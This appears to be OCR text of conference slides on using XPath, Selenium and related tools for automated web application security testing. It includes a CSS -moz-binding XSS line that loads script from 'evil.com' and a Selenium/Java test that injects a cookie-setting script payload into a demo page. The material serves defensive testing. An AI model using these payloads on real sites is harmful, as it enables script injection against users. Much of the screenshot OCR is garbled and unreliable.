Path X 



Explosive Security Testing 
Tools with XPath 
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Interesting questions 
-Technique improvements 
-Error handling 
-Knowing when to stop 
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Introduction to vulnerability theory 
-Researcher instinct 
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Real vulnerability in Google 
-Not on the top level domain 
-CSS consumed and then run 
-Reflected XSS through CSS 
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<table><tr><td>Google 
text</td></tr> 
</table> 

< ! DOCTYPE . . . 

<html> 

<head> 

<link rel=" stylesheet "> 



• Interaction 

• Crossover 

• Trigger 

• (Activation) 



tr: first-child td{-moz- 
binding:url( "http: //evil .com/xss . js" ) ; } 
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OWASP 

WASC 

NIST 

DHS BSI, Cigital 

Source code in tools 
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Movement away from ad-hoc methods 
Cowboy coders 
What is missing? 

-Specialized language 

-A clear entry path 

-Peer review 

-Standards, practices, & procedures 
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Marcin Wielgoszewski 
Andre Gironda 



tssci-security.com 
trusted systems, TCSEC 
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Richness of the 
jser experience 




^mi^^vmTymKn o: 
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Goal 


CSS3 


XPath 


All <p> elements 


P 


//P 


All child elements 


p>* 


//P/* 


Element by ID 


#foo 


//♦[©id^foo'] 


Element by class 


.foo 


//*[contains(@class,'foo')] 


Element with attribute 


♦[title] 


//*[@title] 




-re- / c-rn DDAnrn nf 

1001 
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If you're using regular expressions 
against a web application, you're 
barking up the wrong tree 

XPath is like a filesystem 

Parser libs: LibXML2, REXML, XOM 
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ontent) 



base display XML base of the node 

setbase URI change the XHL base of the node 

bye leave shell 

cat [node] display node or current node 

cd [path] change directory to path or to root 

dir [path] dumps informations about the node [namespace, attributes, c 

du [path] show the structure of the subtree under path or the current 



exit leave shell 

help display this help 

free display memory usage 

load [name] load a new document with name 

Is [path] list contents of path or the current directory 
set xml_f ragment replace the current node content with the fragment pars 
ed in context 

xpath expr evaluate the XPath expression in that context and print the 
result 

setns nsreg register a namespace to a prefix in the XPath evaluation co 



format for nsreg is: prefix=[nsuri] [i.e. prefix= unsets a 
prefix] 

setrootns register all namespace found on the root element 

the default namespace if any uses 'defaultns' prefix 

pwd display current working directory 

quit leave shell 

save [name] save this document to name or the original name 

write [name] write the current node to the filename 

validate check the document for errors 

relaxng rng validate the document agaisnt the Relax-NG schemas 

grep string search for a string in the subtree 
/ > cd //input [@type='submit ' ] [1] 
input > pwd 

/html/body/center/form/table/tr/td[2]/input[3] 
input > cat 
■-input name="btnG" type="submit" value="Google Search"> 
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You've used grep right? 
X/HTML isn't greppable 
Tree, push and pull-parsers 
-DOM (XPath), SAX 
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Not fun 

HTML Tidy and XML Untidy 
Tidy bindings or Beautiful/RubyfulSoup 
NekoHTML and TagSoup in Java 
Browsers already handle it 
-Both good and bad... 
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Protocol Drivers 

-cURL, twill 
Application Drivers 

-HtmlUnit, jWebUnit, WebDriver 
Browser Drivers 

-Watir, Selenium, WebDriver 




16 



ts/sci security 



OJ^POll 01101001 00100Q00 01110011 Q110Q101 01100011 01110101 01110010 01101001 0111Q100 01111001 



Firebug, XPather, View Source Chart 
+XPath Checker, Selenium IDE 

Use XPath extensions to get locations of 
HTML entities 

Start building tests in Selenium IDE 
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fjihlittWiHUifliUiliiiiiitf 



k» 



File Edit View History Bookmarks Tools Help 



- <e > & a •- d- 



^ Qj filei/Z/home/marcin/research/shmoocon/new/awesome. html 



El- 



Google 



Q OW^SP Phoenix ... i__^tssci security 
_l Awesome 



AWESOME 



Awesome AJAX Application 



Please, enteryour nick and press chat! 



_l Selenium Functional Test Runner v.. 



AWESOME AJA;<. APPLICATION 



'&- Inspect Edit , in 



put ■- din 1 diutfrnntfint body html 



Console HTML C! 



B <html xmlns="http: 
!±i <:head> 
B <body> 



Copy HTML 
Copy innerHTML 
Copy XPath 



Log Events 



Scroll Into View 



Inspect in DOM Tab 



-v 



YSlow 



Options * 



S <div id="he 

B <div id=" content "> 

B <div> 

© <p> 

<input type="text" size="50" name- , 'narne"/» 
<br/> 

<input type="button" value="Chat " name="chat "/> 

</div^ 



Style Layout DOM 



Text 

font-family 
font-size 
font-weight 



"Sans" 

10.6667px 

400 



)*\m o m 



yu? 



Options" 



font- style 


normal 


color 


#101010 


text-transform 


none 


text- d e c o rati o n 


none 


letter-spacing 


normal 


word-spacing 


normal 


line-height 


normal 


text-align 


center 


vertical-align 


baseline 


direction 


Itr 


Background 



Ql Done 



, YSlow 



Cookie Watcher 



■j Awesome - Mozilla Firefox 

File Edit View History Bookmarks Tools Help 



im 



- & , & a %- si- 



<v a D file:///home/marcin/research/shmoocon/new/awesome.html 



t El" ,:- 



Q OWASP Phoenix ... ^tssci security 
[j Awesome 



l_j Selenium Functional Test Runner v.. 



AWESOME 



Awesome AJAX Application 



XPather Browser 



l-TI-iat 



XPath- /html/body/diu[(aid= l content l ]/diu/input[2] 



AWESOME AJAX Af 



Reg Exp 



Matching Nodes (count: 1 from 1 



Subst 



XPath Checker 



U=— s, la 



XPath: id('content')/div/input[2] 



Namespaces 


' 


http://www.w3.org/1999/xhtml 


E 3 







Results from file:///home/marcin/research/shmoocon/new/a wesome.html 
One match found 




no full XPath 



1 /html/body/div[(aid='content']/div/input[2] 



Content of the selected nodes 



lent I inner HTMLl Web Clipping XPaths] Info] 



T | 



— I 



I E -' 1 



K 



]J^j Done 



<£ {g. YSlow 



Cookie Watcher 



DOM Inspecti 



s 



Fjle Edit Search View Help 



Q £4 [file:///home/marcin/research/shrnoo con/new/a wesome.html 



Inspect 



Document - DOM Nodes 



XPath 

nodeName 



Dody/div[@id='content']/div/input[2] 



Eva I 



©DIV 

#text 
0D IV 

#text 
3-D IV 

#text 
(+} P 

#text 
I INPUT 
i-BR 
#text 
INPUT 
#text 
#text 
#text 
©SCRIPT 
#text 
#text 
0-D IV 

#text 



id 



class 



header 
content 



footer 



► - 



- 



Object -Javascript Object 



DOM Node 
Box Model 
XBL Bindings 
CSS Style Rules 
Computed Style 
Javascript Object 



size 
■■■5 re 
-type 

useMap 
-value 

select 

click 

controllers 

textLength 

setSelectionRange 

offsetTop 

offsetLeft 

offsetWidth 

offsetHeight 
(joffsetParent 
UlnnerHTML 



Value 






k 



false 

false 

-1 

false 



"button" 

ii ii 

"Chat" 

function selectO { [nati... 

function clickf) { [native... 

(null) 

4 

function setSelectionRang... 

169 

lu 

52 

35 

[object HTMLBodyElement] 
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Record and playback your actions 
Put Firefox in autopilot mode 
Tests are saved in an HTML table 
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I Awesome - Mozilla Firefo 



— 



Rle Edit View History .Bookmarks Tools Help 



* - . - <? I ffl Si \ f £- 



_| file7//home/marcin/research/shmoocon/new/a wesome.html 



|Q t c-i' 



I- V 



Qj QWASP Phoenix ... LJtssci security 




© g. YSlou 



Cookie Watcher 



Extend tests built in the IDE and string 
them together to create test suites 

-Add actions and assertions for a 
comprehensive test 

Run Selenium tests from any browser 
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Exploit the DOM via XSS 

Example taken from XSS Attacks' 
awesome.html by pdp 

The test 

-Bypass input validation 

-Seta cookie (DOM XSS) 

-Verify cookie exists 

-Delete cookie 
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i Selenium Functional Test Runner vO. 



Rle Edit View History .Bookmarks Tools Help 



^C^U^L^m:.^!,..^ 



_T~~ 



* - . ~ e> . . fl a ®- sir 



<\jO Q file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.html?test=../xs t [Q| 



Google 



Qj OWASP Phoenix ... ^ tssci security 



XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 



open 



deleteCookie 



type 



did 



file :///home/marcin/research/shmoocon/new/a wesome.html 



//input[@name='chat'] 



name=xss 



verifyCookie 
deleteCookie name 



/ 



Selenium TestRunner 



Execute Tests- 



<script>do( 
expires=Thi Fast: 
UTC; path= 



P^ *¥ 



I - Highlight elements 



Elapsed: 00.00 
Tests Commands 

run passed 
failed failed 

incomplete 



ilojlt 



-Tools 








View DOM | 


Show Log J 



T 
Test Suite 



Current Test 



Control Panel 



Selenium 

by ThoughtWorks and friends 

For more information on Selenium, visit 

http: //selenium, openqa, org 



B 



jm* Inspect Clear Profile 



, Console HTML CSS Script DOM Net YSlov 



Options ▼ 



Run Clear Copy Console Bookmarklets *■ 



Qy 



Ql Done 



O ^ YSlow 1.731s Cookie Watcher 



i Selenium Functional Test 
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j— 



File Edit View History FJookmarks Tools Help 



♦ - N - ^ I fl 



0- ^ 



^Jo Q file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.html?test=../x£ t [Q]t g 
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XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 

open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



name 



did 



//input[@>name='chat'] 
verifyCookie name=xss 
deleteCookie 



- 



AWESOME 



Awesome AJAX Application 



AWESOME AJAX APPLICATION 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests — 

Fast Slo^ 



77 



I - Highlight elements 



Elapsed: 00:11 
Tests Commands 

run passed 
failed failed 

incomplete 



-Tools 








View DOM| 


Show Log j 



•4§f* Inspect Clear Profile 



, Console | HTML CSS Script DOM Net YSlow 



Options ▼ 



Run Clear Copy Console Bookmarklets *■ 



QQ 



Ql Done 



O |£ YSI 



ow 1.731s 



Cookie Watcher 



i Selenium Functional Test 



jtmmaHititstiiiliMihaiiXMiaaimm 



j— 



File Edit View History FJookmarks Tools Help 



* - - : ~ e> > fl 



«- ih 



"tfo [j file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.htrnl?test=../x£ t [GJ" G 



Q] OWASP Phoenix ... j^tssci security 



XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 



open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



did 



//input[@>name='chat'] 
verifyCookie name=xss 
deleteCookie 



- 



AWESOME 



Awesome AJAX Application 



AWESOME AJAX APPLICATION 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests — 

|i>=1 F=l [W1 [%] 

Fast Slo^ 



77 



I - Highlight elements 



Elapsed: 00:21 
Tests Commands 

run passed 
failed failed 

incomplete 



-Tools 








View DOM | 


Show Log j 



jm* Inspect Clear Profile 
, Console [ HTML CSS Script DOM Net YSlow 



Options ▼ 



document . cookie; 



document. cookie; 



Run Clear Copy Console Bookmarklets *■ 



QQ 



Ql Done 



O ^ YSlow 1.731s Cookie Watcher 



i Selenium Functional Test Runner vO. 



Rle Edit View History .Bookmarks Tools Help 



^C^U^L^m:.^!,..^ 



J~~ 



* - - : ~ e> I fl 



** ^ 



<\jO Q file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.htrnl?test=../x£ t [Q| 



Google 



Q] OWASP Phoenix ... j^tssci security 



XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 



open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



dick 



//input[(fflname='chat'] 
verifyCookie name=xss 
deleteCookie 



< 



AWESOME 



Awesome AJAX Application 



Please, enteryour nick ant) press chat! 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests — 

Fast Slo^ 



77 



I - Highlight elements 



Elapsed: 00:33 
Tests Commands 

run passed 
failed failed 

incomplete 



-Tools 








View DOM | 


Show Log J 



AWESOME AJAX APPLICATION 



jm* Inspect Clear Profile 
, Console [ HTML CSS Script DOM Net YSlow 



Options ▼ 



document . cookie; 



document. cookie; 



Run Clear Copy Console Bookmarklets *■ 



QQ 



;T. Done 



O ^ YSlow 1.731s Cookie Watcher 



i Selenium Functional Test 
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j— 



Rle Edit View History Eiookmarks Tools Help 
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XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 

open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



name 



dick //input[@>name='chat'] 

verifyCookie name=xss 



deleteCookie name 



< 



AWESOME 

Awesome AJAX Application 
Welcome I You can type your message into the form below. 



scripts-document ,cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UJ.C; path=/' ;</script> > 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests — 

Fast Slo^ 



77 



I - Highlight elements 



Elapsed: 00:53 
Tests Commands 

run passed 
failed failed 

incomplete 



-Tools 








View DOM | 


Show Log j 



, Console [ HTML CSS Script DOM Net YSlow 



jm* Inspect Clear Profile 



Options ▼ 



document . cookie; 



document. cookie; 



Run Clear Copy Console Bookmarklets *■ 



QQ 



Ql Done 



O |£ YSI 



ow 1.731s 



Cookie Watcher 



i Selenium Functional Test Runner vO. 



Rle Edit View History .Bookmarks Tools Help 



^C^U^L^m:.^!,..^ 



J~~ 
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XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 

open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



name 



dick //input[@>name='chat'] 

verifyCookie name=xss 
deleteCookie name 



- 



AWESOME 

Awesome AJAX Application 
Welcome I You can type your message into the form below. 



scripts-document , cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/' ;</script> > 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests — 

Fast Slo^ 



77 



I - Highlight elements 



Elapsed: 01:11 
Tests Commands 
run 1 passed 
failed failed 

incomplete 



-Tools 








View DOM | 


Show Log J 



j Console j HTML CSS Script DOM Net YSlov 



jm* Inspect Clear Profile 



Options ▼ 



»:> document . cookie; 

»:> document . cookie; 
"name=xs5" 



document. cookie; 



Run Clear Copy Console Bookmarklets *■ 



QQ 



;T. Done 



O ^ YSlow 1.731s Cookie Watcher 



i Selenium Functional Test 
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Rle Edit View History Eiookmarks Tools Help 
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"tfo Q| file:///home/marcin/research/shmoocon/new/selenium/core/TestRunner.html?test=../x£ t [Q]t g 
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XSS Attack Test Suite 

Test for XSS Attacks 



Set a cookie in the DOM 

open file:///home/marcin/research/shmoocon/new/awesome,html 

deleteCookie name 



type 



name 



dick //input[@>name='chat'] 

verifyCookie name=xss 
deleteCookie name 



- 



AWESOME 

Awesome AJAX Application 
Welcome I You can type your message into the form below. 



scripts-document ,cookie='name=xss; expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/' ;</script> > 



<script>docL 
expires=Thu 
UTC; path=/' 



Selenium TestRunner 



Execute Tests- 



Fast 



77 



P^ \>~- 



I - Highlight elements 



Elapsed: 01:21 
Tests Commands 

1 run 1 passed 
failed failed 

incomplete 



iloja 



-Tools 








View DOM | 


Show Log j 



j Console j HTML CSS Script DOM Net YSlov 



jm* Inspect Clear Profile 



Options ▼ 



»:> document . cookie; 

»:> document . cookie; 

"name=3:ss" 

»:> document . cookie; 



document. cookie; 



Run Clear Copy Console Bookmarklets *■ 



QQ 



Ql Done 



O ^ YSlow 1.731s Cookie Watcher 



Write tests in HTML tables 

Just a taste of what you can test for 

-Test for illegal characters 

-Input validation 

-No XSS or SQL injection Cheatsheet 
necessary 
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Take Selenium test suites and use 
throughout Secure SDLC 

Run tests at compilation and during 
integration phase 

-Ant build tasks, etc 
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package com. example. tests; 

import com. thoughtworks. selenium.*; 
import Java. util.regex. Pattern; 



public class NewTest extends SeleneseTestCase { 

public void testl\lew() throws Exception { 

selenium. open("/awesome. html"); 

selenium. deleteCookie("name", "/"); 

selenium. type("name", "<script>document.cookie='name=xss; 
expires=Thu, 2 Aug 2010 20:47:11 UTC; path=/';</script>"); 

selenium. click("//input[@name= , chat , ] n ); 

verifyEquals("name=xss", selenium. getCookie()); 

selenium. deleteCookie("name", "/"); 



} 



} 
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Don't use Java? There's C#, Perl, PHP, 
Python and Ruby too! 

Tests are made portable with XPath 
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Selenium or WebDriver 

Think of other places in the lifecycle 

-Inspection with PMD 

-Web application security scanner for 
operations / maintenance testing 

-Other places? 
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Selenium examples as table-driven 
-Can also be script-driven 
-Data-driven 
-Capture/Replay 
100% automation is better 
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Quality testers used script-driven 

-With TCL 

-Some Perl 

-Others Python 
NIST Expect 

-autoexpect 
AutoRuby ? 
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Popular open-source webapp test tool 
Extension to Ant 
Write tests in XML 
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Use any / all ; mix and match 
Domain-specific language 

-Specialized languages 
XPath as a specialized language 

-Use between tools 
Fit in different parts of the lifecycle 
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Watch & Listen 

-Think aloud protocol 

Record 

Script / data-driven / table 

Exploratory testing 

Measure test cases, test charters, and 
testers 
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Exploiting Online Games combinatorics 
-Induce lag (WoW-Dupe) 
-Spell interactions 
Pairwise 

-Orthogonal arrays 
-All-pairs tables with tester's choice 
Increases coverage of tests 
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Operations testing 

-Fuzzers with code coverage 

-Web application security scanners 

-Fuzz before purchase 
Acceptance testing 

-Selenium approach 

-Devlnspect, AppScan DE, others 

-Fuzz before release 
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Integration testing 

-Simultaneous with build (WebTest) 

Component testing? 

-Apache Cactus, Jetty (Selenium 
Server), TESTARE, MonoRails 

Limitations in Unit testing 
-Input validation and special chars 
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Security testing in every phase 

Ability to generate functional test code 
from operations/acceptance tools 

XPath decreases complexity of 
information exchange 
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